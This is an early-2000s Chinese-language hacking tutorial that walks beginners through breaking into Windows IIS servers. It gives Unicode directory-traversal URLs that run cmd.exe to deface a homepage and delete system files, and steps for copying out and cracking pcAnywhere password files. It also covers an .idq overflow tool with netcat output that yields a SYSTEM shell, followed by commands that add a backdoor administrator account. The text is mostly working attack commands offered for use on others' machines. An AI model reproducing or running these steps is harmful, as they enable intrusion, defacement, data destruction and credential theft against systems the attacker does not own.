流行的漏洞入侵(一)
出处:www.5dmail.net 作者:5dmail 时间:2003-10-4 12:31:00
1 UNICODE漏洞
这是老漏洞了,但对于新手来说很好用,而且事实证明现在仍有很多的机子有这种漏洞,OK我们开始
先用扫描器扫到有UNICODE漏洞的机子,(注意漏洞的编码方式有所不同有的是..%CI%IC.. 用的是..%C0%AF..当然还有其它的方式, 具体根据你的扫描器扫出的结果为标准
我们在流览器(IE)的地址栏中输入
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+dir
这时你可以看到它的系统目录但我们要的是主页面放置的目录
在输入
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot
看到了吧,目录中的INDEX.HTML INDEX.ASP DEFAULT.ASP DEFAULT.ASP等等就是它的主页面,
我们来换它的页面
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe
http://ip/scripts/ccc.exe?/c+echo+Hacked+by+KAWEN+ >+c:\inetpub\wwwroot\default.asp
OK
成功了,此时它的主页面被换成了HACKED BY KAWEN
大家可以看看
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe 执行后是复制,如果换成这个呢
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+DEL+c:\winnt\system32\cmd.exe
没错就是删除了
知道怎么做了吧
呵呵
2利用PCANWHERE攻击网站
现在开始入正题了,刚才只是热身
由于NT的机器一般使用PCAnyWhere进行远程管理,因此如果能够得到PCAnyWhere远程连接的帐号和密码,那么就能远程连接到主机。 ( http://fxyong.3322.net/getpwd.zip )便可以取得帐号和密码
Telnet IP 5631
我们可以看看PCANYWHERE开了没
使用Unicode漏洞+ PCanyWhere密码查看工具
首先我们要DOWN一个可以破 Pcanywhere的工具
http://www.symantec.com/
OK 我们现在要找到主机上的*.CIF文件
在IE中输入 http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+dir c:\*.cif /s
一般Citempl.cif为系统默认的密码文件,因此我们需要SA.CIF文件。 复制该文件到网站目录下。
需要知道网站目录,可以通过ida,idq漏洞进行得到,也可以去寻找网站中的一个图片文件,比如Tscontent.gif文件,然后去查找该文件:使用命令 dir c:\ Tscontent.gif /s
比如网站目录为c:\inetpub\wwwroot\ 一般都有是啦 呵呵
密码文件所在目录:c:\Program Files\pcANYWHERE\DATA
下面执行Copy命令:
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+copy c:\Program Files\pcANYWHERE\DATA\SA.CGI c:\inetpub\wwwroot\
显示1 file(s) copied,就表示复制成功了。
使用IE下载该文件
使用 http://IP/sa.cif 就可以下载该文件了。
使用PCanyWhere密码查看工具得到用户名和密码
3利用.idq漏洞
为了方便大家可以看懂下面说的是什么可以先到这里来看看
http://snake12.top263.net/IISOverflow/IISOverflow.htm
一共有两个版本.一个是GUI版本.一个是命令行版本.
这里我们来说CUI版本,反正都差不多了,关键是要多试
首先我们要找到有.IDQ漏洞的机子,可以用流光扫一下
运行软件
在被攻击IP地址后面写上对方的IP.端口号一般不需要改动.
左面选择操作系统类型.先选择IIS5 English Win2k Sp0吧~
软件的默认绑定CMD.EXE的端口是813.不改了.用默认吧~~~
点击IDQ溢出~~OK~~出现发送Shellcode成功的提示了.
接着我们用NC,你可以到到盟下载 www.CNHONKER.COM
C:\>nc -vv XXX.XXX.XXX.XXX 813
XXX.XXX.XXX.XXX: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [XXX.XXX.XXX.XXX] 813 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
OK!!!上来了
你现在有SYSTEM权限,不错吧,该做什么不用我教了吧,比如为自已留下个后门
net user hacker password /add '添加一给名为hacker,密码为passwod的用户!
net localgroup administrators hacker /add ' 把刚才创建的用户加入 Admnistrators组
OK我们在来看看DOS版本
下载软件后会有个运行文件,它太长了,将它必名为KAWEN
D:\>KAWEN
运行参数: 操作系统类型 目的地址 web端口 溢出端口
支持的操作系统 类型: ----
0 -- IIS5中文Win2k Sp0
1 -- IIS5中文Win2k Sp1
2 -- IIS5中文Win2k Sp2
3 -- IIS5 English Win2k Sp0
4 -- IIS5 English Win2k Sp1
5 -- --not support -- IIS5 English Win2k Sp2
6 -- IIS5 Japanese Win2k Sp0
7 -- IIS5 Japanese Win2k Sp1
8 -- --not support -- IIS5 Japanese Win2k Sp2
D:\>KAWEN 3 XXX.XXX.XXX.XXX80 456
连接目的机器 XXX.XXX.XXX.XXX:80 OK.
发送shellcode 到 XXX.XXX.XXX.XXX:80 OK
现在,你可以 连接 该主机的 端口 456了,good luck.!
开始吧
D:\>nc -vv XXX.XXX.XXX.XXX 456
mail.rycf.org [XXX.XXX.XXX.XXX] 456 (?): connection refused
sent 0, rcvd 0: NOTSOCK
没成功.试试sp1.
D:\>KAWEN 4 XXX.XXX.XXX.XXX 80 888
连接目的机器 XXX.XXX.XXX.XXX:80 OK.
发送shellcode 到 XXX.XXX.XXX.XXX:80 OK
现在,你可以 连接 该主机的 端口 888了,good luck.!
D:\>nc -vv XXX.XXX.XXX.XXX 888
XXX.XXX.XXX.XXX: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [XXX.XXX.XXX.XXX] 888 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
看看我们又成功了